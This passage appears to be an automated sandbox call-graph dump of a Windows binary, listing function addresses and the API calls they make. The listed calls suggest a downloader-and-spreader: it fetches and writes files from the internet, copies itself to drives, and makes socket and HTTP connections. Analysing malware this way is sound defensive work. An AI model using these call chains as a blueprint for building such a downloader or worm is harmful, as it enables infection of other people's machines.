40c934 4750->4751 4760 4026f0 4751->4760 4753 40c94c 4753->4739 4755 4024ce 4754->4755 4757 402484 _invalid_parameter 4754->4757 4755->4744 4756 40a740 _invalid_parameter 3 API calls 4756->4755 4758 40a740 _invalid_parameter 3 API calls 4757->4758 4759 4024ac 4757->4759 4758->4759 4759->4756 4763 402710 4760->4763 4762 40270a 4762->4753 4764 402724 4763->4764 4765 402540 __aligned_recalloc_base 10 API calls 4764->4765 4766 40276d 4765->4766 4767 402540 __aligned_recalloc_base 10 API calls 4766->4767 4768 40277d 4767->4768 4769 402540 __aligned_recalloc_base 10 API calls 4768->4769 4770 40278d 4769->4770 4771 402540 __aligned_recalloc_base 10 API calls 4770->4771 4772 40279d 4771->4772 4773 4027a6 4772->4773 4774 4027cf 4772->4774 4778 403e20 4773->4778 4795 403df0 4774->4795 4777 4027c7 __aligned_recalloc_base 4777->4762 4779 402820 _invalid_parameter 7 API calls 4778->4779 4780 403e37 4779->4780 4781 402820 _invalid_parameter 7 API calls 4780->4781 4782 403e46 4781->4782 4783 402820 _invalid_parameter 7 API calls 4782->4783 4784 403e55 4783->4784 4785 402820 _invalid_parameter 7 API calls 4784->4785 4794 403e64 _invalid_parameter __aligned_recalloc_base 4785->4794 4787 40400f _invalid_parameter 4788 402850 _invalid_parameter 3 API calls 4787->4788 4789 404035 _invalid_parameter 4787->4789 4788->4787 4790 402850 _invalid_parameter 3 API calls 4789->4790 4791 40405b _invalid_parameter 4789->4791 4790->4789 4792 402850 _invalid_parameter 3 API calls 4791->4792 4793 404081 4791->4793 4792->4791 4793->4777 4794->4787 4798 402850 4794->4798 4802 404090 4795->4802 4797 403e0c 4797->4777 4799 40285b 4798->4799 4801 402866 4798->4801 4800 40a740 _invalid_parameter 3 API calls 4799->4800 4800->4801 4801->4794 4803 4040a6 _invalid_parameter 4802->4803 4804 4040b8 _invalid_parameter 4803->4804 4805 4040dd 4803->4805 4807 404103 4803->4807 4804->4797 4832 403ca0 4805->4832 4808 40413d 4807->4808 4809 40415e 4807->4809 4842 404680 4808->4842 4811 402820 _invalid_parameter 7 API calls 4809->4811 4812 40416f 4811->4812 4813 402820 _invalid_parameter 7 API calls 4812->4813 4814 40417e 4813->4814 4815 402820 _invalid_parameter 7 API calls 4814->4815 4816 40418d 4815->4816 4817 402820 _invalid_parameter 7 API calls 4816->4817 4818 40419c 4817->4818 4855 403d70 4818->4855 4820 402820 _invalid_parameter 7 API calls 4821 4041ca _invalid_parameter 4820->4821 4821->4820 4823 404284 _invalid_parameter __aligned_recalloc_base 4821->4823 4822 402850 _invalid_parameter 3 API calls 4822->4823 4823->4822 4824 4045a3 _invalid_parameter 4823->4824 4825 402850 _invalid_parameter 3 API calls 4824->4825 4826 4045c9 _invalid_parameter 4824->4826 4825->4824 4827 402850 _invalid_parameter 3 API calls 4826->4827 4828 4045ef _invalid_parameter 4826->4828 4827->4826 4829 402850 _invalid_parameter 3 API calls 4828->4829 4830 404615 _invalid_parameter 4828->4830 4829->4828 4830->4804 4831 402850 _invalid_parameter 3 API calls 4830->4831 4831->4830 4833 403cae 4832->4833 4834 402820 _invalid_parameter 7 API calls 4833->4834 4835 403ccb 4834->4835 4836 402820 _invalid_parameter 7 API calls 4835->4836 4838 403cda _invalid_parameter 4836->4838 4837 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4837->4838 4838->4837 4839 403d3a _invalid_parameter 4838->4839 4840 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4839->4840 4841 403d60 4839->4841 4840->4839 4841->4804 4843 402820 _invalid_parameter 7 API calls 4842->4843 4844 404697 4843->4844 4845 402820 _invalid_parameter 7 API calls 4844->4845 4846 4046a6 4845->4846 4847 402820 _invalid_parameter 7 API calls 4846->4847 4854 4046b5 _invalid_parameter __aligned_recalloc_base 4847->4854 4848 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4848->4854 4849 404841 _invalid_parameter 4850 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4849->4850 4851 404867 _invalid_parameter 4849->4851 4850->4849 4852 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4851->4852 4853 40488d 4851->4853 4852->4851 4853->4804 4854->4848 4854->4849 4856 402820 _invalid_parameter 7 API calls 4855->4856 4857 403d7f _invalid_parameter 4856->4857 4858 403ca0 _invalid_parameter 9 API calls 4857->4858 4860 403db8 _invalid_parameter 4858->4860 4859 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4859->4860 4860->4859 4861 403de3 4860->4861 4861->4821 4863 40a2b2 4862->4863 4866 40a200 4863->4866 4867 40a530 __aligned_recalloc_base 7 API calls 4866->4867 4874 40a210 4867->4874 4870 40a740 _invalid_parameter 3 API calls 4872 40809f 4870->4872 4871 40a24c 4871->4870 4872->4727 4874->4871 4874->4872 4875 409730 4874->4875 4882 409d20 4874->4882 4887 40a0f0 4874->4887 4876 409739 4875->4876 4877 409743 4875->4877 4876->4874 4877->4876 4878 409786 memset 4877->4878 4878->4876 4879 4097a7 4878->4879 4879->4876 4880 4097ad memcpy 4879->4880 4895 409500 4880->4895 4883 409d37 4882->4883 4886 409d2d 4882->4886 4884 409e2f memcpy 4883->4884 4883->4886 4900 409a50 4883->4900 4884->4883 4886->4874 4889 40a106 4887->4889 4893 40a0fc 4887->4893 4888 409a50 64 API calls 4890 40a187 4888->4890 4889->4888 4889->4893 4891 409500 6 API calls 4890->4891 4890->4893 4892 40a1a6 4891->4892 4892->4893 4894 40a1bb memcpy 4892->4894 4893->4874 4894->4893 4896 40954e 4895->4896 4898 40950e 4895->4898 4896->4876 4898->4896 4899 409440 6 API calls 4898->4899 4899->4898 4902 409a6a 4900->4902 4904 409a60 4900->4904 4902->4904 4910 409890 4902->4910 4904->4883 4905 409ba8 memcpy 4905->4904 4907 409bc7 memcpy 4908 409cf1 4907->4908 4909 409a50 62 API calls 4908->4909 4909->4904 4911 40989d 4910->4911 4912 4098a7 4910->4912 4911->4904 4911->4905 4911->4907 4912->4911 4913 409930 4912->4913 4915 409935 4912->4915 4916 409918 4912->4916 4921 4091f0 4913->4921 4917 409500 6 API calls 4915->4917 4919 409500 6 API calls 4916->4919 4917->4913 4919->4913 4920 4099dc memset 4920->4911 4922 409209 4921->4922 4930 4091ff 4921->4930 4923 4090c0 9 API calls 4922->4923 4922->4930 4924 409302 4923->4924 4925 40a530 __aligned_recalloc_base 7 API calls 4924->4925 4926 409351 4925->4926 4927 408f30 46 API calls 4926->4927 4926->4930 4928 40937e 4927->4928 4929 40a740 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4928->4929 4929->4930 4930->4911 4930->4920 4950 40a3e0 GetCurrentProcessId 4931->4950 4933 40a57b 4934 40a400 __aligned_recalloc_base 5 API calls 4933->4934 4939 40a587 __aligned_recalloc_base 4933->4939 4934->4939 4935 405cb5 4935->4711 4935->4712 4936 40a680 _invalid_parameter HeapValidate 4936->4939 4937 40a630 HeapAlloc 4937->4939 4938 40a5fa HeapReAlloc 4938->4939 4939->4935 4939->4936 4939->4937 4939->4938 4940 40a740 _invalid_parameter 3 API calls 4939->4940 4940->4939 4944 40c72b 4941->4944 4942 40a530 __aligned_recalloc_base 7 API calls 4942->4944 4943 405d4d 4943->4712 4945 4072a0 4943->4945 4944->4942 4944->4943 4946 40a530 __aligned_recalloc_base 7 API calls 4945->4946 4947 4072b0 4946->4947 4948 4072f7 4947->4948 4949 4072bc memcpy CreateThread CloseHandle 4947->4949 4948->4712 4949->4948 4951 407300 4949->4951 4950->4933 4952 407371 4951->4952 4960 407311 4951->4960 4953 40737c DeleteUrlCacheEntry 4952->4953 4954 40736f 4952->4954 4955 40f070 64 API calls 4953->4955 4956 40a740 _invalid_parameter 3 API calls 4954->4956 4955->4954 4958 4073a6 4956->4958 4957 407320 StrChrA 4959 407344 DeleteUrlCacheEntry 4957->4959 4957->4960 4963 40f070 9 API calls 4959->4963 4960->4954 4960->4957 4960->4959 4964 40f133 InternetOpenUrlW 4963->4964 4965 40f29e InternetCloseHandle Sleep 4963->4965 4966 40f291 InternetCloseHandle 4964->4966 4967 40f162 CreateFileW 4964->4967 4968 40f2c5 7 API calls 4965->4968 4969 407359 Sleep 4965->4969 4966->4965 4971 40f191 InternetReadFile 4967->4971 4972 40f284 CloseHandle 4967->4972 4968->4969 4970 40f354 wsprintfW DeleteFileW Sleep 4968->4970 4969->4960 4973 40ed50 21 API calls 4970->4973 4974 40f1e4 CloseHandle wsprintfW DeleteFileW Sleep 4971->4974 4975 40f1b5 4971->4975 4972->4966 4977 40f394 4973->4977 4991 40ed50 CreateFileW 4974->4991 4975->4974 4976 40f1be WriteFile 4975->4976 4976->4971 4979 40f3d2 DeleteFileW 4977->4979 4980 40f39e Sleep 4977->4980 4979->4969 4982 40ef10 6 API calls 4980->4982 4985 40f3b5 4982->4985 4983 40f277 DeleteFileW 4983->4972 4984 40f23b Sleep 4986 40ef10 6 API calls 4984->4986 4985->4969 4987 40f3c8 ExitProcess 4985->4987 4988 40f252 4986->4988 4989 40f266 ExitProcess 4988->4989 4990 40f26e 4988->4990 4990->4972 4992 40ed95 CreateFileMappingW 4991->4992 4993 40eeaa 4991->4993 4994 40eea0 CloseHandle 4992->4994 4995 40edb6 MapViewOfFile 4992->4995 4996 40eeb0 CreateFileW 4993->4996 4997 40ef01 4993->4997 4994->4993 4998 40edd5 GetFileSize 4995->4998 4999 40ee96 CloseHandle 4995->4999 5000 40eed2 WriteFile CloseHandle 4996->5000 5001 40eef8 4996->5001 4997->4983 4997->4984 5002 40edf1 4998->5002 5003 40ee8c UnmapViewOfFile 4998->5003 4999->4994 5000->5001 5004 40a740 _invalid_parameter 3 API calls 5001->5004 5013 40cd80 5002->5013 5003->4999 5004->4997 5007 40c720 7 API calls 5008 40ee40 5007->5008 5008->5003 5009 40ee5d memcmp 5008->5009 5009->5003 5010 40ee79 5009->5010 5011 40a740 _invalid_parameter 3 API calls 5010->5011 5012 40ee82 5011->5012 5012->5003 5014 40c7b0 10 API calls 5013->5014 5015 40cda4 5014->5015 5015->5003 5015->5007 5017 40dccd htons inet_addr setsockopt 5016->5017 5023 40ddfe 5016->5023 5018 40b010 8 API calls 5017->5018 5019 40dd46 bind lstrlenA sendto ioctlsocket 5018->5019 5020 40dd9b 5019->5020 5024 40ddc2 5020->5024 5025 40a570 9 API calls 5020->5025 5064 40de20 5020->5064 5023->4493 5073 40b0d0 shutdown closesocket 5024->5073 5025->5020 5080 40e150 memset InternetCrackUrlA InternetOpenA 5026->5080 5029 40e02e 5029->4493 5031 40dffb 5032 40a740 _invalid_parameter 3 API calls 5031->5032 5032->5029 5038 40dff1 SysFreeString 5038->5031 5187 40afd0 inet_addr 5041->5187 5044 40b0bd 5049 40ea00 5044->5049 5045 40b06c connect 5046 40b080 getsockname 5045->5046 5047 40b0b4 5045->5047 5046->5047 5190 40b0d0 shutdown closesocket 5047->5190 5191 40afb0 inet_ntoa 5049->5191 5051 40ea16 5052 40cf80 11 API calls 5051->5052 5053 40ea35 5052->5053 5059 40dc5c 5053->5059 5192 40ea80 memset InternetCrackUrlA InternetOpenA 5053->5192 5056 40ea6c 5058 40a740 _invalid_parameter 3 API calls 5056->5058 5057 40a740 _invalid_parameter 3 API calls 5057->5056 5058->5059 5059->4502 5063 40a864 5060->5063 5061 40a86a 5061->4494 5062 40a740 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5062->5063 5063->5061 5063->5062 5065 40de3c 5064->5065 5066 40df04 5065->5066 5067 40de58 recvfrom 5065->5067 5066->5020 5068 40de86 StrCmpNIA 5067->5068 5069 40de79 Sleep 5067->5069 5068->5065 5070 40dea5 StrStrIA 5068->5070 5069->5065 5070->5065 5071 40dec6 StrChrA 5070->5071 5074 40ce30 5071->5074 5073->5023 5076 40ce3b 5074->5076 5075 40ce41 lstrlenA 5075->5076 5077 40ce54 5075->5077 5076->5075 5076->5077 5078 40a530 __aligned_recalloc_base 7 API calls 5076->5078 5079 40ce70 memcpy 5076->5079 5077->5065 5078->5076 5079->5076 5079->5077 5081 40e1f1 InternetConnectA 5080->5081 5082 40df2a 5080->5082 5083 40e35a InternetCloseHandle 5081->5083 5084 40e22a HttpOpenRequestA 5081->5084 5082->5029 5093 40e040 5082->5093 5083->5082 5085 40e260 HttpSendRequestA 5084->5085 5086 40e34d InternetCloseHandle 5084->5086 5087 40e340 InternetCloseHandle 5085->5087 5090 40e27d 5085->5090 5086->5083 5087->5086 5088 40e2cb 5088->5087 5089 40e29e InternetReadFile 5089->5088 5089->5090 5090->5088 5090->5089 5091 40a570 9 API calls 5090->5091 5092 40e2e6 memcpy 5091->5092 5092->5090 5122 405630 5093->5122 5096 40e06a SysAllocString 5097 40e081 CoCreateInstance 5096->5097 5098 40e137 5096->5098 5100 40e12d SysFreeString 5097->5100 5102 40e0a6 5097->5102 5099 40a740 _invalid_parameter 3 API calls 5098->5099 5101 40df43 5099->5101 5100->5098 5101->5031 5103 40e9b0 5101->5103 5102->5100 5139 40e500 5103->5139 5106 40e380 5144 40e7d0 5106->5144 5111 40e930 6 API calls 5112 40e3d7 5111->5112 5118 40dfc2 5112->5118 5161 40e5f0 5112->5161 5115 40e40f 5115->5118 5166 40e4a0 5115->5166 5116 40e5f0 6 API calls 5116->5115 5118->5038 5119 40cf80 5118->5119 5182 40cef0 5119->5182 5123 40563d 5122->5123 5124 405643 lstrlenA 5123->5124 5126 40a530 __aligned_recalloc_base 7 API calls 5123->5126 5128 405656 5123->5128 5129 40a740 _invalid_parameter 3 API calls 5123->5129 5130 4055d0 5123->5130 5134 405580 5123->5134 5124->5123 5124->5128 5126->5123 5128->5096 5128->5101 5129->5123 5131 4055e7 MultiByteToWideChar 5130->5131 5132 4055da lstrlenA 5130->5132 5133 40560c 5131->5133 5132->5131 5133->5123 5135 40558b 5134->5135 5136 405591 lstrlenA 5135->5136 5137 4055d0 2 API calls 5135->5137 5138 4055c7 5135->5138 5136->5135 5137->5135 5138->5123 5142 40e526 5139->5142 5140 40dfad 5140->5031 5140->5106 5141 40e5a3 lstrcmpiW 5141->5142 5143 40e5bb SysFreeString 5141->5143 5142->5140 5142->5141 5142->5143 5143->5142 5145 40e7f6 5144->5145 5146 40e39b 5145->5146 5147 40e883 lstrcmpiW 5145->5147 5146->5118 5156 40e930 5146->5156 5148 40e903 SysFreeString 5147->5148 5149 40e896 5147->5149 5148->5146 5150 40e4a0 2 API calls 5149->5150 5152 40e8a4 5150->5152 5151 40e8f5 5151->5148 5152->5148 5152->5151 5153 40e8d3 lstrcmpiW 5152->5153 5154 40e8e5 5153->5154 5155 40e8eb SysFreeString 5153->5155 5154->5155 5155->5151 5157 40e4a0 2 API calls 5156->5157 5159 40e94b 5157->5159 5158 40e3b9 5158->5111 5158->5118 5159->5158 5160 40e7d0 6 API calls 5159->5160 5160->5158 5162 40e4a0 2 API calls 5161->5162 5164 40e60b 5162->5164 5163 40e3f5 5163->5115 5163->5116 5164->5163 5170 40e670 5164->5170 5167 40e4c6 5166->5167 5168 40e4dd 5167->5168 5169 40e500 2 API calls 5167->5169 5168->5118 5169->5168 5171 40e696 5170->5171 5172 40e7ad 5171->5172 5173 40e723 lstrcmpiW 5171->5173 5172->5163 5174 40e7a3 SysFreeString 5173->5174 5175 40e736 5173->5175 5174->5172 5176 40e4a0 2 API calls 5175->5176 5178 40e744 5176->5178 5177 40e795 5177->5174 5178->5174 5178->5177 5179 40e773 lstrcmpiW 5178->5179 5180 40e785 5179->5180 5181 40e78b SysFreeString 5179->5181 5180->5181 5181->5177 5186 40cefd 5182->5186 5183 40cea0 _vscprintf wvsprintfA 5183->5186 5184 40cf18 SysFreeString 5184->5038 5185 40a570 9 API calls 5185->5186 5186->5183 5186->5184 5186->5185 5188 40affc socket 5187->5188 5189 40afe9 gethostbyname 5187->5189 5188->5044 5188->5045 5189->5188 5190->5044 5191->5051 5193 40ea57 5192->5193 5194 40eb24 InternetConnectA 5192->5194 5193->5056 5193->5057 5195 40eca4 InternetCloseHandle 5194->5195 5196 40eb5d HttpOpenRequestA 5194->5196 5195->5193 5197 40eb93 HttpAddRequestHeadersA HttpSendRequestA 5196->5197 5198 40ec97 InternetCloseHandle 5196->5198 5199 40ec8a InternetCloseHandle 5197->5199 5202 40ebdd 5197->5202 5198->5195 5199->5198 5200 40ebf4 InternetReadFile 5201 40ec21 5200->5201 5200->5202 5201->5199 5202->5200 5202->5201 5203 40a570 9 API calls 5202->5203 5204 40ec3c memcpy 5203->5204 5204->5202 5210 406ff7 5205->5210 5206 4071cb 5208 4071d4 SysFreeString 5206->5208 5209 406f9b SysFreeString 5206->5209 5207 40a740 _invalid_parameter 3 API calls 5207->5206 5208->5209 5209->4506 5211 407250 CoCreateInstance 5210->5211 5212 407146 SysAllocString 5210->5212 5213 407012 5210->5213 5211->5210 5212->5210 5212->5213 5213->5206 5213->5207 5215 40c45a 5214->5215 5216 40c45e 5214->5216 5215->4512 5218 40c410 CryptAcquireContextW 5216->5218 5219 40c44b 5218->5219 5220 40c42d CryptGenRandom CryptReleaseContext 5218->5220 5219->5215 5220->5219 5221->4536 5273 40b360 gethostname 5222->5273 5225 40b449 5225->4536 5227 40b45c strcmp 5227->5225 5228 40b471 5227->5228 5277 40afb0 inet_ntoa 5228->5277 5230 40b47f strstr 5231 40b4d0 5230->5231 5232 40b48f 5230->5232 5280 40afb0 inet_ntoa 5231->5280 5278 40afb0 inet_ntoa 5232->5278 5235 40b49d strstr 5235->5225 5239 40b4ad 5235->5239 5236 40b4de strstr 5237 40b4ee 5236->5237 5238 40b52f 5236->5238 5281 40afb0 inet_ntoa 5237->5281 5283 40afb0 inet_ntoa 5238->5283 5279 40afb0 inet_ntoa 5239->5279 5243 40b4fc strstr 5243->5225 5246 40b50c 5243->5246 5244 40b53d strstr 5247 40b54d 5244->5247 5248 40b58e EnterCriticalSection 5244->5248 5245 40b4bb strstr 5245->5225 5245->5231 5282 40afb0 inet_ntoa 5246->5282 5284 40afb0 inet_ntoa 5247->5284 5249 40b5a6 5248->5249 5258 40b5d1 5249->5258 5286 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5249->5286 5252 40b51a strstr 5252->5225 5252->5238 5253 40b55b strstr 5253->5225 5254 40b56b 5253->5254 5285 40afb0 inet_ntoa 5254->5285 5257 40b6ca LeaveCriticalSection 5257->5225 5258->5257 5260 40a320 7 API calls 5258->5260 5259 40b579 strstr 5259->5225 5259->5248 5261 40b615 5260->5261 5261->5257 5287 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5261->5287 5263 40b633 5264 40b660 5263->5264 5265 40b656 Sleep 5263->5265 5267 40b685 5263->5267 5266 40a740 _invalid_parameter 3 API calls 5264->5266 5265->5263 5266->5267 5267->5257 5288 40b110 5267->5288 5269->4540 5271 40b110 14 API calls 5270->5271 5272 40b103 LeaveCriticalSection 5271->5272 5272->4532 5274 40b387 gethostbyname 5273->5274 5275 40b3a3 5273->5275 5274->5275 5275->5225 5276 40afb0 inet_ntoa 5275->5276 5276->5227 5277->5230 5278->5235 5279->5245 5280->5236 5281->5243 5282->5252 5283->5244 5284->5253 5285->5259 5286->5258 5287->5263 5289 40b124 5288->5289 5296 40b11f 5288->5296 5290 40a530 __aligned_recalloc_base 7 API calls 5289->5290 5291 40b138 5290->5291 5292 40b194 CreateFileW 5291->5292 5291->5296 5293 40b1e3 InterlockedExchange 5292->5293 5294 40b1b7 WriteFile FlushFileBuffers CloseHandle 5292->5294 5295 40a740 _invalid_parameter 3 API calls 5293->5295 5294->5293 5295->5296 5296->5257 5298 40d7ed 5297->5298 5299 40d723 5298->5299 5300 40d811 WaitForSingleObject 5298->5300 5299->4547 5299->4548 5300->5298 5301 40d82c CloseHandle 5300->5301 5301->5298 5307 407407 5302->5307 5303 4074e1 Sleep 5303->5307 5304 40742f Sleep 5304->5307 5305 40745e Sleep wsprintfA DeleteUrlCacheEntry 5332 40efc0 InternetOpenA 5305->5332 5307->5303 5307->5304 5307->5305 5308 40f070 64 API calls 5307->5308 5308->5307 5310 405829 memset GetModuleHandleW 5309->5310 5311 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5310->5311 5311->5311 5312 4058a0 CreateWindowExW 5311->5312 5313 4058cb 5312->5313 5314 4058cd GetMessageA 5312->5314 5315 4058ff ExitThread 5313->5315 5316 4058e1 TranslateMessage DispatchMessageA 5314->5316 5317 4058f7 5314->5317 5316->5314 5317->5310 5317->5315 5339 40ed00 CreateFileW 5318->5339 5320 406b80 5321 406cd8 ExitThread 5320->5321 5323 406cc8 Sleep 5320->5323 5324 406bb9 5320->5324 5342 406340 GetLogicalDrives 5320->5342 5323->5320 5348 406260 5324->5348 5327 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5328 406c66 wsprintfW 5327->5328 5329 406c7b wsprintfW 5327->5329 5328->5329 5354 406650 _chkstk 5329->5354 5330 406beb 5333 40efe6 InternetOpenUrlA 5332->5333 5334 40f058 Sleep 5332->5334 5335 40f005 HttpQueryInfoA 5333->5335 5336 40f04e InternetCloseHandle 5333->5336 5334->5307 5337 40f044 InternetCloseHandle 5335->5337 5338 40f02e 5335->5338 5336->5334 5337->5336 5338->5337 5340 40ed48 5339->5340 5341 40ed2f GetFileSize CloseHandle 5339->5341 5340->5320 5341->5340 5345 40636d 5342->5345 5343 4063e6 5343->5320 5344 40637c RegOpenKeyExW 5344->5345 5346 40639e RegQueryValueExW 5344->5346 5345->5343 5345->5344 5347 4063da RegCloseKey 5345->5347 5346->5345 5346->5347 5347->5345 5349 4062b9 5348->5349 5350 40627c 5348->5350 5349->5327 5349->5330 5389 4062c0 GetDriveTypeW 5350->5389 5353 4062ab lstrcpyW 5353->5349 5355 406667 5354->5355 5356 40666e 6 API calls 5354->5356 5355->5330 5357 406722 5356->5357 5358 406764 PathFileExistsW 5356->5358 5359 40ed00 3 API calls 5357->5359 5360 406803 PathFileExistsW 5358->5360 5361 406779 SetFileAttributesW DeleteFileW PathFileExistsW 5358->5361 5366 40672e 5359->5366 5364 406814 5360->5364 5365 406859 FindFirstFileW 5360->5365 5362 4067a9 CreateDirectoryW 5361->5362 5363 4067cb PathFileExistsW 5361->5363 5362->5363 5367 4067bc SetFileAttributesW 5362->5367 5363->5360 5368 4067dc CopyFileW 5363->5368 5369 406834 5364->5369 5370 40681c 5364->5370 5365->5355 5387 406880 5365->5387 5366->5358 5371 406745 SetFileAttributesW DeleteFileW 5366->5371 5367->5363 5368->5360 5373 4067f4 SetFileAttributesW 5368->5373 5375 406400 3 API calls 5369->5375 5394 406400 CoInitialize CoCreateInstance 5370->5394 5371->5358 5372 406942 lstrcmpW 5376 406958 lstrcmpW 5372->5376 5372->5387 5373->5360 5377 40682f SetFileAttributesW 5375->5377 5376->5387 5377->5365 5378 406b19 FindNextFileW 5378->5372 5380 406b35 FindClose 5378->5380 5380->5355 5381 40699e lstrcmpiW 5381->5387 5382 406a05 PathMatchSpecW 5384 406a26 wsprintfW SetFileAttributesW DeleteFileW 5382->5384 5382->5387 5383 406a83 PathFileExistsW 5385 406a99 wsprintfW wsprintfW 5383->5385 5383->5387 5384->5387 5386 406b03 MoveFileExW 5385->5386 5385->5387 5386->5378 5387->5372 5387->5378 5387->5381 5387->5382 5387->5383 5398 406510 CreateDirectoryW wsprintfW FindFirstFileW 5387->5398 5390 4062e8 5389->5390 5393 40629f 5389->5393 5391 4062fc QueryDosDeviceW 5390->5391 5390->5393 5392 406316 StrCmpNW 5391->5392 5391->5393 5392->5393 5393->5349 5393->5353 5395 406436 5394->5395 5397 406472 5394->5397 5396 406440 wsprintfW 5395->5396 5395->5397 5396->5397 5397->5377 5399 406565 lstrcmpW 5398->5399 5400 40663f 5398->5400 5401 406591 5399->5401 5402 40657b lstrcmpW 5399->5402 5400->5387 5404 40660c FindNextFileW 5401->5404 5402->5401 5403 406593 wsprintfW wsprintfW 5402->5403 5403->5401 5406 4065f6 MoveFileExW 5403->5406 5404->5399 5405 406628 FindClose RemoveDirectoryW 5404->5405 5405->5400 5406->5404 5407 40d440 5412 40d444 5407->5412 5409 40d460 WaitForSingleObject 5411 40d485 5409->5411 5409->5412 5412->5409 5412->5411 5413 40b790 EnterCriticalSection 5412->5413 5418 40d060 InterlockedExchangeAdd 5412->5418 5414 40b7c7 LeaveCriticalSection 5413->5414 5415 40b7af 5413->5415 5414->5412 5416 40c450 3 API calls 5415->5416 5417 40b7ba 5416->5417 5417->5414 5419 40d07d 5418->5419 5429 40d076 5418->5429 5435 40d350 5419->5435 5422 40d09d InterlockedIncrement 5432 40d0a7 5422->5432 5424 40d0d0 5445 40afb0 inet_ntoa 5424->5445 5426 40d0dc 5427 40d1a0 InterlockedDecrement 5426->5427 5460 40b0d0 shutdown closesocket 5427->5460 5429->5412 5430 40a530 __aligned_recalloc_base 7 API calls 5430->5432 5431 40d280 6 API calls 5431->5432 5432->5424 5432->5427 5432->5430 5432->5431 5434 40a740 _invalid_parameter 3 API calls 5432->5434 5442 40bab0 5432->5442 5446 40bb00 5432->5446 5434->5432 5436 40d35d socket 5435->5436 5437 40d372 htons connect 5436->5437 5438 40d3cf 5436->5438 5437->5438 5439 40d3ba 5437->5439 5438->5436 5440 40d08d 5438->5440 5461 40b0d0 shutdown closesocket 5439->5461 5440->5422 5440->5429 5462 40ba10 5442->5462 5445->5426 5456 40bb11 5446->5456 5448 40bb2f 5450 40a740 _invalid_parameter 3 API calls 5448->5450 5451 40bedf 5450->5451 5451->5432 5452 40bef0 21 API calls 5452->5456 5455 40bab0 13 API calls 5455->5456 5456->5448 5456->5452 5456->5455 5457 40b410 32 API calls 5456->5457 5470 40c040 5456->5470 5477 40b7e0 EnterCriticalSection 5456->5477 5482 406e20 5456->5482 5487 406ec0 5456->5487 5492 406cf0 5456->5492 5499 406df0 5456->5499 5457->5456 5460->5429 5461->5440 5463 40c490 3 API calls 5462->5463 5464 40ba1b 5463->5464 5465 40ba37 lstrlenA 5464->5465 5466 40c720 7 API calls 5465->5466 5467 40ba6d 5466->5467 5468 40ba98 5467->5468 5469 40a740 _invalid_parameter 3 API calls 5467->5469 5468->5432 5469->5468 5471 40c051 lstrlenA 5470->5471 5472 40c720 7 API calls 5471->5472 5476 40c06f 5472->5476 5473 40c07b 5474 40c0ff 5473->5474 5475 40a740 _invalid_parameter 3 API calls 5473->5475 5474->5456 5475->5474 5476->5471 5476->5473 5480 40b7f8 5477->5480 5478 40b834 LeaveCriticalSection 5478->5456 5480->5478 5502 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5480->5502 5481 40b823 5481->5478 5503 406e60 5482->5503 5485 406e59 5485->5456 5486 40d6f0 17 API calls 5486->5485 5488 406e60 75 API calls 5487->5488 5489 406edf 5488->5489 5490 406f0c 5489->5490 5518 406f20 5489->5518 5490->5456 5521 405f40 EnterCriticalSection 5492->5521 5494 406d0a 5495 406d3d 5494->5495 5526 406d50 5494->5526 5495->5456 5498 40a740 _invalid_parameter 3 API calls 5498->5495 5533 406000 EnterCriticalSection 5499->5533 5501 406e12 5501->5456 5502->5481 5506 406e73 5503->5506 5504 406e34 5504->5485 5504->5486 5506->5504 5507 405e50 EnterCriticalSection 5506->5507 5508 40cdb0 71 API calls 5507->5508 5509 405e6e 5508->5509 5510 405f2b LeaveCriticalSection 5509->5510 5511 405e87 5509->5511 5514 405ea8 5509->5514 5510->5506 5512 405e91 memcpy 5511->5512 5513 405ea6 5511->5513 5512->5513 5515 40a740 _invalid_parameter 3 API calls 5513->5515 5514->5513 5517 405f06 memcpy 5514->5517 5516 405f28 5515->5516 5516->5510 5517->5513 5519 40ba10 13 API calls 5518->5519 5520 406f65 5519->5520 5520->5490 5522 405f5e 5521->5522 5523 405fea LeaveCriticalSection 5522->5523 5524 40a7b0 8 API calls 5522->5524 5523->5494 5525 405fbc 5524->5525 5525->5523 5527 40a530 __aligned_recalloc_base 7 API calls 5526->5527 5528 406d62 memcpy 5527->5528 5529 40ba10 13 API calls 5528->5529 5530 406dcc 5529->5530 5531 40a740 _invalid_parameter 3 API calls 5530->5531 5532 406d31 5531->5532 5532->5498 5558 40ce10 5533->5558 5536 406243 LeaveCriticalSection 5536->5501 5537 40cdb0 71 API calls 5538 406039 5537->5538 5538->5536 5539 406094 memcpy 5538->5539 5557 406158 5538->5557 5542 40a740 _invalid_parameter 3 API calls 5539->5542 5540 405c90 75 API calls 5543 406181 5540->5543 5541 40a740 _invalid_parameter 3 API calls 5544 4061a2 5541->5544 5545 4060b8 5542->5545 5543->5541 5544->5536 5546 4061b1 CreateFileW 5544->5546 5547 40a7b0 8 API calls 5545->5547 5546->5536 5548 4061d4 5546->5548 5549 4060c8 5547->5549 5552 4061f1 WriteFile 5548->5552 5553 40622f FlushFileBuffers CloseHandle 5548->5553 5550 40a740 _invalid_parameter 3 API calls 5549->5550 5551 4060ef 5550->5551 5554 40c720 7 API calls 5551->5554 5552->5548 5553->5536 5555 406125 5554->5555 5556 4072a0 71 API calls 5555->5556 5556->5557 5557->5540 5557->5543 5561 40c360 5558->5561 5565 40c371 5561->5565 5562 40a7b0 8 API calls 5562->5565 5563 40c38b 5566 40a740 _invalid_parameter 3 API calls 5563->5566 5564 40c2c0 70 API calls 5564->5565 5565->5562 5565->5563 5565->5564 5568 408080 68 API calls 5565->5568 5569 40c3cb memcmp 5565->5569 5567 406022 5566->5567 5567->5536 5567->5537 5568->5565 5569->5563 5569->5565 5570 40d1c0 5575 40d220 5570->5575 5573 40d1ee 5574 40d220 send 5574->5573 5576 40d231 send 5575->5576 5577 40d1d3 5576->5577 5578 40d24e 5576->5578 5577->5573 5577->5574 5578->5576 5578->5577 5798 40db80 5804 401470 5798->5804 5800 